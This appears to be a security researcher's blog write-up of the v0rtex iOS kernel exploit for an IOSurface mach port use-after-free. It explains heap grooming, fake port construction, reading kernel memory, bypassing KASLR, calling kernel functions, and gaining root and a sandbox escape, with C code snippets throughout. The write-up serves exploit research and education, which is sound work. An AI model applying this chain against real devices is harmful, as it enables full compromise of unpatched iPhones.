Siguza, 07. Dec 2017 (updated 12. Dec 2017)

v0rtex

Turning the IOSurface inside out.

Introduction

On December 5th, windknown posted about an IOSurface mach port UaF on the Pangu blog, which had been fixed in iOS 11.2 and reported by Ian Beer. Now I neither speak Chinese nor really trust Google Translate with details, but the PoC on the Pangu blog was enough to illustrate the vulnerability and get me going. :P

Update:
Ian’s exploit for iOS 11 is now out as well!

The Exploit

Freeing and reallocating

The bug decreases the ref count on a user-supplied mach port by one too many. This is very nice because it can leave you with a still-valid userland handle to a freed port which can then hopefully be reallocated with controlled contents, yielding a complete fake port.

Windknown’s PoC uses the same port for first and subsequent registration, but I’d rather not have a freed object referenced more than necessary, so we’ll use two different ports - and more, for the sake of heapcraft. We allocate in this order:

A single mach port called realport.
0x1000 mach ports to spray the ipc.ports zone before port.
A single mach port called port (renamed to fakeport once freed).
Another 0x100 mach ports to spray the ipc.ports zone after port.

We then free port via the bug, and release the 0x1100 ports we sprayed as well. In the ipc.ports zone that will hopefully lead to the page on which port resides to have all elements freed. Once that happens, we can use the mach_zone_force_gc MIG call to get the entire page out of the zone, allowing us to reallocate the port with arbitrary memory instead of just valid mach ports. (Note mach_zone_force_gc was disabled in iOS 11, but you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should be a significant spike.)

One obstacle I faced though was that the IOSurface bug seemed to have some asynchronicity or whatnot - for a short time after IOConnectCallAsyncStructMethod returned, the port seemed to still be valid, however after a sleep(1) it was not. I didn’t feel like hunting down the cause of that, so I simply increased the ref count on port by using mach_ports_register on my own task, which would cause the bug to still drop one ref too many, but not free it anymore. Now after that call returns, we can usleep(100000) to synchronise, and then use mach_ports_register again to decrease the ref on port again, this time freeing it synchronously. And since we call mach_ports_register already, we also register our IOSurfaceRootUserClient handle there because we’re gonna need that for later. All that remains is a call to mach_zone_force_gc and if everything worked out, the memory that contained port is now available for reallocation.

At this point we’re gonna reallocate it, but how exactly and with what contents? My favourite heap allocation primitive is OSUnserializeXML (or OSUnserializeBinary to be exact) because it allows for fine-grained control over allocation and contents, allows for both arbitrary data and pointers, and is used in many places. So since we’re dealing with IOSurface anyway I figured we might as well use IOSurface properties. An IOSurfaceRootUserClient offers external methods 9, 10 and 11 to parse arbitrary data with OSUnserializeXML, store the result in the kernel, and read back or delete that result at any time. I’ll leave the implementation details on this for another time, but they’re effectively the same as IOSurfaceSetValue, IOSurfaceCopyValue and IOSurfaceRemoveValue, just faster since no CoreFoundation object serialisation has to happen.
Alright, so we’ve got to reallocate the freed pages. In order to avoid creating holes, this is best done with allocations of the page size or smaller. On A9 and later the page size is 16KB, but on A8 and earlier the it is actually 4KB despite the 16KB being exported to userland - so we’re gonna use 0x1000 here. Now, OSData would normally seem like the best choice for binary data, but it turns out that doesn’t go through kalloc anymore for allocations larger or equal to the page size. The next best choice to me is OSString which works well, so long as you take into account that a null terminator is added when unserialising, so in order to get a 0x1000 allocation, you’ll want to have only 0xfff bytes of serialised data.

Fake port construction

At this point we merely have to put some data into our OSStrings, and the kernel will treat it as a mach port. So let’s start with a look at the structure:

typedef struct {
    uint32_t ip_bits;
    uint32_t ip_references;
    struct {
        kptr_t data;
        uint32_t type;
        uint32_t pad;
    } ip_lock; // spinlock
    struct {
        struct {
            struct {
                uint32_t flags;
                uint32_t waitq_interlock;
                uint64_t waitq_set_id;
                uint64_t waitq_prepost_id;
                struct {
                    kptr_t next;
                    kptr_t prev;
                } waitq_queue;
            } waitq;
            kptr_t messages;
            uint32_t seqno;
            uint32_t receiver_name;
            uint16_t msgcount;
            uint16_t qlimit;
            uint32_t pad;
        } port;
        kptr_t klist;
    } ip_messages;
    kptr_t ip_receiver;
    kptr_t ip_kobject;
    kptr_t ip_nsrequest;
    kptr_t ip_pdrequest;
    kptr_t ip_requests;
    kptr_t ip_premsg;
    uint64_t ip_context;
    uint32_t ip_flags;
    uint32_t ip_mscount;
    uint32_t ip_srights;
    uint32_t ip_sorights;
} kport_t;

(Here kptr_t is just a typedef to a type of the kernel’s pointer size. Also on 32-bit, the two pad fields are missing.)

There is a slight problem now though: we don’t know at which offset the mach ports start. When a page is allocated into a zone with elements of size x, the first element will start at offset 0, the second one at x, then x * 2, etc. Depending on x, that might leave less or more memory at the end of a page unused. To minimise such losses, XNU can expand the allocation size of a zone up to 32KB. On 10.3.3 the size of a mach port is 0xa8 bytes (0x74 for 32-bit), and the ipc.ports zone makes allocations of 0x3000 bytes. That means the first port will be allocated at offset 0x0, the second at 0xa8, etc., and the last port on the first page will start at 0xfc0 and extend onto the second page - but that means the first port on the second page will start at offset 0x1068 rather than 0x1000, and the same thing repeats for the third page as well. The problem with that is that when we reallocate those pages, we don’t know whether they used to be the first, second or third of their chunk - even using an allocation size of 0x3000 ourselves wouldn’t help, since that might as well start on a second or third page and just extend beyond it, since pages are units of their own.

So what we’ll have to do now is create a structure that is valid no matter with which of the three possible offsets it is accessed. These offsets are 0x0, 0x68 and 0x28 respectively for first, second and third page. The absolute minimum for a valid port is an intact lock, so we’ll start with that. Long story short, initialisation looks like this:

kport_t triple_kport =
{
    .ip_lock =
    {
        .data = 0x0,
        .type = 0x11,
    },
    .ip_messages =
    {
        .port =
        {
            .waitq =
            {
                .waitq_queue =
                {
                    .next = 0x0,
                    .prev = 0x11,
                }
            },
        },
    },
    .ip_nsrequest = 0x0,
    .ip_pdrequest = 0x11,
};

Now so far this works, but it’s obvious that as the struct populates, this will become a hazardous deathtrap. So it’d be nice if you could use a first, minimal mach port to detect which offset we’re dealing with, and then reallocate at just that offset without all this cruft. A very viable way to do this was previously outlined by Ian Beer in his mach_portal write-up, making use of the ip_context field. In short, the mach_port_get_context MIG call lets you fetch the ip_context field of a port while touching nothing but that field and the port’s lock. So what does ip_context overlay with when shifted? For the first page that’s just ip_context, for the second page it’s the field msgcount, qlimit and pad of ip_messages.port, and for the third page it’s the type and pad fields of ip_lock. So the lower 32 bits of ip_context might intersect with ip_lock.type which is rather critical, but that still leaves us with the upper 32 bits in any case. That is plenty, and allows us to store both what offset is being used, as well as and identifier for the OSString object we’re dealing with. So given a number i from which we can derive what key we later need to use to free and reallocate the OSString, this is how we initialise ip_context:

volatile kport_t *dptr = ...;
for(size_t j = 0; j < DATA_SIZE / sizeof(kport_t); ++j)
{
    dptr[j].ip_context = (dptr[j].ip_context & 0xffffffff) | ((uint64_t)(0x10000000 | i) << 32);
    dptr[j].ip_messages.port.pad = 0x20000000 | i;
    dptr[j].ip_lock.pad = 0x30000000 | i;
}

Now when using the result of mach_port_get_context, the bits 0x3000000000000000 tell us whether our port was on page one, two or three, and the bits 0x0fffffff00000000 allow us to identify on which OSString it resides.

Reading memory and defeating KASLR

Now we can properly reallocate it, but with what? In the end we’ll probably want an IKOT_IOKIT_CONNECT-type port with a fake IOUserClient object, allowing us to call arbitrary kernel code, so at the very least we’ll need to know the kernel slide. To get there, we probably want an arbitrary read primitive first, but for that we need an address to start from, and so far we don’t know a single valid kernel pointer. At this point I figured I had two options:

Leverage a kernel pointer comparison (such as with the clock system port) to brute-force the kernel slide.
Get a valid pointer into our fake port struct somehow and read back the OSString.

The former sounds like a horrible idea in our setting - since we have to change ip_kobject, we’d have to reallocate the OSString over and over, each time risking the memory getting snatched by something else. The latter, however, turns our to be very viable. In the kernel’s struct ipc_port there are a number of struct ipc_port * members, one of which is ip_pdrequest. That field can hold a pointer to a mach port which is to be notified on port death, and it can be set via mach_port_request_notification, provided the target port is of type IKOT_NONE (i.e. target is in userland) and the notification port is a send-once or receive right (from which a send-once one is then made). A very nice thing about the mach_port subsystem is that the mach messages are sent to the task port whose IPC space contains the port, rather than to the port itself (which would cause a major headache for us with our fake port). So let’s create an IKOT_NONE port:

kport_t kport =
{
    .ip_bits = 0x80000000, // IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE
    .ip_references = 100,
    .ip_lock =
    {
        .type = 0x11,
    },
    .ip_messages =
    {
        .port =
        {
            .receiver_name = 1,
            .msgcount = MACH_PORT_QLIMIT_KERNEL,
            .qlimit = MACH_PORT_QLIMIT_KERNEL,
        },
    },
    .ip_srights = 99,
};

Reference counts exist just to prevent deallocation, and MACH_PORT_QLIMIT_KERNEL prevents accidental sending of messages to the port. Now we can register a send-once or receive right, such as e.g. realport on it:

mach_port_t old = MACH_PORT_NULL; // unused
mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, realport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &old);

And now we merely need to read back the OSString with IOSurfaceRootUserClient’s external method 10, look for a kport_t with ip_pdrequest != 0, and we have the kernel’s address for realport!

Now, how do we read arbitrary memory? A previous version of my exploit used pid_for_task with an IKOT_TASK-type port and a fake task in userland. That allowed for trivial updating of the address to read from, but it also only worked on systems with a shared address space and no SMAP (i.e. A7-A9). In order for it to work on A6 and A10, the fake task would have to be put in kernel memory at a known address, which is not so straightfoward.
First there’s the problem of getting data at a known address. So far we don’t know the address of anything but realport, whose contents are not exactly controllable. However since fakeport was originally allocated as a receive right, the same trick that we used to leak realport can again be used on fakeport. That doesn’t just give us the address of fakeport, but of the entire 0x1000 OSString buffer it resides on! That should be enough scratch space for a fake task. :P
But now comes the second problem: updating the address. Unless we want to leak a mere 4 bytes of kernel memory, we’re gonna need to update our fake tasks bsd_info pointer. As with fakeport, the only way to do that seems via reallocation of the OSString. For a large number of reads, that sounds like a really bad idea. If only there was a way to just write to that memory… or is there?

Remember ip_context? That field you can not only read from userland, but also set, which means you can write at least as much as 8 bytes directly to a known address. With that, we could overlay our fake port and task in a way that fakeport->ip_context and faketask->bsd_info mapped to the same address - and then we could use mach_port_set_context to update bsd_info, sparing us the reallocations. However that means that if our fake port is at the very beginning of the allocation, most of the fake task’s field will lie before our allocation. One such field is the reference count, which is accessed by pid_for_task and which might cause the fake task to be freed, something we definitely don’t want. However, there is a mechanism very similar to pid_for_task, but with slightly different constraints: mach_port_get_attributes. For a flavor value of MACH_PORT_DNREQUESTS_SIZE, that will return the value fakeport->ip_requests->ipr_size->its_size, so long as ip_requests is != NULL. That call can again only be made on ports for which the caller has a receive right (unlike pid_for_task), but instead of a 0x550 bytes large fake task struct, we only have to deal with 0x10 bytes for a fake ip_requests. Also its_size is 4 bytes wide just like the value returned by pid_for_task. So we can pretty much read a 32-bit value from an addr like so:

mach_msg_type_number_t outsz = 1;
int value = 0;
mach_port_set_context(self, fakeport, addr);
mach_port_get_attributes(self, fakeport, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)&value, &outsz);

Now we can finally start reading from the only other kernel address we know, realport. Jumping from one pointer to the next, we can get a pointer back to the main kernel binary by means of: realport->receiver->is_task->itk_registered[0]->ip_kobject->vtab. That is, from realport we read the struct ipc_space it belongs to (receiver) and from that we get the task_t by which it is owned (is_task), which is our own task. Now remember how we passed the port to IOSurfaceRootUserClient to mach_ports_register in the beginning? Thanks to that, we can now read a pointer to that port from itk_registered[0], from that a pointer to the IOSurfaceRootUserClient object itself, and from that a pointer to its C++ vtable, which is, at long last, a value from which we can derive the kernel slide.

Kernel code execution

While our fake port is still set for reading, we can also leak most of the IOSurfaceRootUserClient’s vtable contents and start building a fake vtable. That will allow us to create a fake IOUserClient object, to which we can then stash a pointer in fakeport->ip_kobject, and switch the type of fakeport to IKOT_IOKIT_CONNECT. Now what we wanna do is swap out IOUserClient::getExternalTrapForIndex in the fake vtable with something that returns an IOExternalTrap whose contents we control. For that, I use a gadgets like so:

add x0, x0, 10
ret

That simply returns the address of the memory after the fake object’s vtable pointer and reference count, so we can put an object and a function pointer right after those. Here we run once again into a problem though: we have two pointers that we want to update, but only one ip_context. So we’ll have to extend our write capabilities on the OSString buffer before we can proceed. Now, with the knowledge of the kernel slide and the ability to read arbitrary memory, we could actually build ourselves somewhat of a kernel task port by reading the value of the kernel_map symbol and stashing that into the map field of a fake task - only that we couldn’t call vm_read or vm_write on such a port unless we actually built a valid message queue on our fake port. Such a partial task port is still useful though, because as we’ve seen, there are some APIs that send a MIG message to some other port. One such API is the MIG call mach_vm_remap. That takes a source and a target task, and lets you remap arbitrary memory from the former into the latter. Now the MIG message is sent to the target task port. That means if we wanted to remap kernel memory into our own address space, we would only need our task port to have a functioning message queue! Now, since the OSString buffer was allocated by zalloc, we actually need to pass a zone_map port as source rather than kernel_map, but other than that this call works perfectly:

mach_vm_address_t shmem_addr = 0;
vm_prot_t cur = 0,
          max = 0;
mach_vm_remap(self, &shmem_addr, DATA_SIZE, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, fakeport, fake_addr, false, &cur, &max, VM_INHERIT_NONE);

And with that, we’re done with reallocating for good. We can now edit our fake port directly, as well as anything else residing on our OSString buffer. We could of course also map in any other kernel address, effectively giving us complete kernel r/w. We’re not gonna do that though, but instead go for an even stronger primitive: direct kernel function calls. That still gives us complete r/w via copyin/copyout, but also the ability to call long and complex functions that would be very difficult to simulate with mere r/w. To that end, we construct a fake object on our newly acquired shared memory, and switch the type of fakeport one last time, to IKOT_IOKIT_CONNECT. We can then call iokit_user_client_trap on fakeport, which will lead us to this bit in the kernel:

result = (target->*func)(args->p1, args->p2, args->p3, args->p4, args->p5, args->p6);

We control all of p1 through p6 (passed in via iokit_user_client_trap) as well as target and func (the two pointers after the vtab and ref count) and on top of that, result will be passed back to userland, albeit truncated to the 32 bits.

tfp0

Our true goal is a kernel task port like it used to exist pre-10.3, i.e. before Apple started checking against the kernel_task pointer. In order to get around that check, I would ideally like to run this code in the kernel:

vm_map_remap(
    kernel_map,
    &remap_addr,
    sizeof(task_t),
    0,
    VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
    zone_map,
    kernel_task,
    false,
    &dummy,
    &dummy,
    VM_INHERIT_NONE
);
mach_vm_wire(&realhost, kernel_map, remap_addr, sizeof(task_t), VM_PROT_READ | VM_PROT_WRITE);
ipc_port_t newport = ipc_port_alloc_special(ipc_space_kernel);
ipc_kobject_set(newport, remap_addr, IKOT_TASK);
realhost.special[4] = ipc_port_make_send(newport);

Now there are two problems with that: First, that call to vm_map_remap has 11 arguments but our kernel call interface allows us only to pass 7, and second that pointer returned by ipc_port_alloc_special is gonna have its top 32 bits cut off. Getting around the vm_map_remap is rather simple: we just create two new ports with fake tasks representing the kernel_map and the zone_map, and pass those to mach_vm_remap in userland. Getting a 64-bit return value from our kernel call interface isn’t so easy though. What’s easier is to take advantage of the fact that the pointer will point to somewhere in the zone_map, which on iOS is still far smaller than 4GB. That means if we know the base address of the zone_map, the lower 32 bits of a pointer are enough to determine its original value! Knowing the address of the zone_map struct, we merely need to read its header from offset 0x10, and we get a start and end pointer, allowing us to do the necessary computations.

Now we just call bzero on &self_task->bsd_info->p_ucred->cr_uid with a size of 12 to elevate us to uid 0, and copy the kernel’s p_ucred->cr_label to our own credentials to get us out of the sandbox, and we’re done. :)

Future work

32-bit

In principle all of this should work on 32-bit as well, but things might be different due to different pointer size. In particular the thing with the three possible page offsets might either be less or more complicated, depending on how many pages are chunked into the ipc.ports zone on 32-bit, and resulting from that which fields overlay in a port struct.

I lack a 32-bit device that can go higher than 9.3.5 though, so… I can offer my knowledge to devs wanting to take a stab at it, but I won’t personally do it.

ETA wen?

I don’t know. I suppose this is a good time to start writing my own patchfinder (I want a maintainable one), so… I guess I’ll actually do that. No idea what roadblocks I’ll run into though, or how long that’ll take. But don’t expect anything soon.

Conclusion

Awesome bug, mad props to Ian Beer (and windknown?) for finding it! Also props to both of them for all their previous work, not sure whether we’d all be where we are today without you.

Now, lots of work to be done! If anyone wants to chip in with anything, I’m readily available on Discord (Siguza#7111). For updates on this as well as general iOS hacking, you can follow me on ~~Twitter~~ Mastodon.

The exploit code can be found on GitHub.

References

windknown: IOSurface UaF (PoC)
Ian Beer: async_wake (iOS 11 exploit)
Ian Beer: Through the mach portal (write-up)